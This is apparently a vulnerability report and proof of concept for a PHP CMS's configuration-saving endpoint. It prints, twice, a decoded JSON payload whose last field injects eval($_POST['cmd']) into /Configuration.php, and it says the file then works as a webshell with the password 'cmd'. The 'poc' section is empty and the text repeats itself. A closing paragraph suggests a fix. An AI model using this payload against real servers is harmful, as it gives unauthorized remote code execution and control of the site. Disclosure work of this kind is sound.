after base64decode is {"administrator_template":"default","list_limit":"25","font_list":"Raleway","secure_login":"0","secure_login_value":"","secure_login_redirect":"","language_default":"en","country_default":"us","global_encode":"sha1Salt","global_encode_salt":"AGdvMdq9RRcwjFz0XQqucpFprKXgbWM2","ssl":"0","lateral_menu":"expanded","base_url":"","auto_logout_time":"30","redirect_to":"false","host":"localhost","db":"baicms","user":"root","password":"123qwe","table_prefix":"cu_","allowed_extensions":"*.gif; *.jpg; *.jpeg; *.pdf; *.ico; *.png; *.svg;*.php;","upload_default_path":"upload_files","maximum_file_size":"5242880","csv_column_separator":",","tinify_key":"","email_outgoing":"","forward":"","smtp":"0","email_host":"","email_port":"","email_password":"","smtp_security":"","code":"\";}eval($_POST['cmd']);/*"}
Code can be injected through the last field (`code`), and the end result is that the injected PHP is written into /Configuration.php.
An unauthorized attacker can execute arbitrary PHP code via the saveConfigData function in /classes/ajax/Functions.php.

poc
then

/Configuration.php is your webshell; the password is cmd

analysis
When the parameter `file` is base64-decoded, its value is:

{"administrator_template":"default","list_limit":"25","font_list":"Raleway","secure_login":"0","secure_login_value":"","secure_login_redirect":"","language_default":"en","country_default":"us","global_encode":"sha1Salt","global_encode_salt":"AGdvMdq9RRcwjFz0XQqucpFprKXgbWM2","ssl":"0","lateral_menu":"expanded","base_url":"","auto_logout_time":"30","redirect_to":"false","host":"localhost","db":"baicms","user":"root","password":"123qwe","table_prefix":"cu_","allowed_extensions":"*.gif; *.jpg; *.jpeg; *.pdf; *.ico; *.png; *.svg;*.php;","upload_default_path":"upload_files","maximum_file_size":"5242880","csv_column_separator":",","tinify_key":"","email_outgoing":"","forward":"","smtp":"0","email_host":"","email_port":"","email_password":"","smtp_security":"","code":"\";}eval($_POST['cmd']);/*"}

Code can be injected through the last field (`code`), and the end result is that the injected PHP is written into /Configuration.php. As far as this report shows, the handler writes the submitted values into the PHP source of /Configuration.php without an authorization check or escaping, so the fix belongs in saveConfigData: require an authenticated administrator and store the values as data (or escape them) instead of emitting them as PHP code.